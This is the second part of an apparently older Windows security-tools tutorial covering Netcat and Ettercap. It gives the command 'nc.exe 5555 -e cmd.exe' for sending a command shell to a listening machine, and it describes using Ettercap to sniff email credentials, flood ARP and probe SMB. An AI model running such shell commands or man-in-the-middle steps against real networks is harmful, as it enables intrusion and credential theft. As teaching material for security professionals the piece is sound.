Tools of the Trade (Part 2)

If you would like to read the other parts in this article series please go to:

In part one of this article series we went over some must have tools like a packet sniffer and network scanner. We also covered their installation and basic usage examples. What we shall now do in part two is cover some of the other tools that should definitely be in your arsenal of computer security tools. Please bear in mind again that with XP SP2 a lot of computer security tools were broken. I shall point out on what platform I am installing the tool on, and will also mention if it can be used on XP SP2. Barring that, simply install the tool on either an XP SP1 computer or Windows 2000 Professional one.

The superlative Netcat

The tool netcat has often been compared to as the “Swiss army knife of TCP/IP”. It is one of the best known tools out there and is really quite indispensable. Please download it here. Once downloaded simply decompress the file and install the nc.exe file on to the root of C drive ie: C:\. You are now ready to use Netcat! Please see the screenshot below for the help menu.

Figure 1

For a quick demo let’s do the following command syntax;

nc.exe 5555 -e cmd.exe

This syntax will export a cmd.exe to another computer which also has netcat listening on port 5555. Pretty neat! Please see the screenshot below for the example.

Figure 2

Please bear in mind that on one computer I input the command syntax noted above in this screenshot to export the cmd.exe to the other computer which had netcat listening on port 5555 as listed in the screenshot above. This is just one of the things that netcat can do for you. You will note in the help menu that there are quite a few other options available to you. This tool also has the ability to do source routing up to four hops away. Netcat may not be as good Nmap but it also has the ability to do port scanning as well. You can also use it to bind to certain ports for enumeration purposes. The list really does go on. There are many excellent tutorials out there that will show detailed usage of this excellent tool and I encourage you to play with it.

Fun with Ettercap

Ettercap is one of those tools that can do an incredible amount of things. It is, by nature, designed for MITM (man in the middle) attacks. Notably its greatest strength is the ability to work in switched environments. Typically on a switched network you would not have the ability to see the traffic from another segment. With Ettercap you most certainly do, and it does so through several means. With that said let’s get the tool downloaded and installed. You may have noticed if you raced ahead and tried to use it already that it may be giving you some errors about some dll files. Please check here for the fix. You will see that you will have to rename libnet.dll and packet.dll to simply libnet and packet. Once you have done so you will be able to use Ettercap. Please see the screenshot below for what it looks like in action.

Figure 3

All I have done in the above screenshot is click on the “Start” menu, and then “Start Sniffing”. From there on I then went to “Hosts” menu and clicked on “Scan for Hosts”. Once that was done I checked for the hosts that were found on the “Host List”. From there I added the address to the target list. A short while after that Ettercap sniffed out both my email account usernames and passwords. While neat, it is by far the least impressive aspect of Ettercap actually. One of the other neat features is after that you have been sniffing for a while you can go and click on “View” and then click on “Profiles”. Up will come a list of IP addresses and you simply double click on one of them to get more detailed info such as MAC address, distance away from you it is, possible operating system in use, and so on. Listed there as well will be any sniffed usernames and passwords.

The meat of Ettercap though can be found at the “Plugins” menu. Once there you will notice that there is a large variety of plugins to be used. For example try the “rand_flood” plugin. To enable it simply double-click on it and to stop it do the same again. Before you do this though make sure you invoke your packet sniffer that I gave you a link to in part one of this article series. This will allow you to see how Ettercap does this ARP flood. For those who have not done so then please see the screenshot below.

Figure 4

You can see from the above screenshot that there is indeed garbage being generated by Ettercap. You would typically see “arp who-has tell” for example and not the garbage that was generated by Ettercap. This is but one of the many, many plug-ins that you can see in the “Plugins” menu. Remember to have that packet sniffer running so that you can give context to the plug-in used by viewing the packets it generated. Some of the other interesting plug-ins that you should give a whirl are the SMB ones that are listed. On an internal network the information gleaned via the SMB protocol can indeed be of use to a hacker. Ettercap is one of those tools that is extremely useful to the security professional for it is also used by those who try and hack your very networks.

While it may appear to you as a GUI only tool, don’t be mistaken for this can also be controlled via the command line in a DOS prompt. I state this simply because it could be installed and then remotely used. It is not only a local attack.

Well so far we have learnt about the tools Netcat and Ettercap. Two very formidable hacking tools when used properly and with a little knowledge. Ettercap alone can keep you busy exploring its many features for some time. Ideally you will explore this tools uses in a switched environment to take full advantage of its capabilities.

On that note I will wrap part two of this article series. In the third and final part of this series we will look at two other tools. Namely, Nemesis the packet crafter, and SPIKE the HTTP proxy. Learning how to use an HTTP proxy will pay dividends to you in not only understanding HTTP better, but also web application security.  We will install both of these tools and play with their functionality. Till next time have fun and keep learning!

If you would like to read the other parts in this article series please go to:

About The Author

Leave a Comment

Your email address will not be published. Required fields are marked *

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Scroll to Top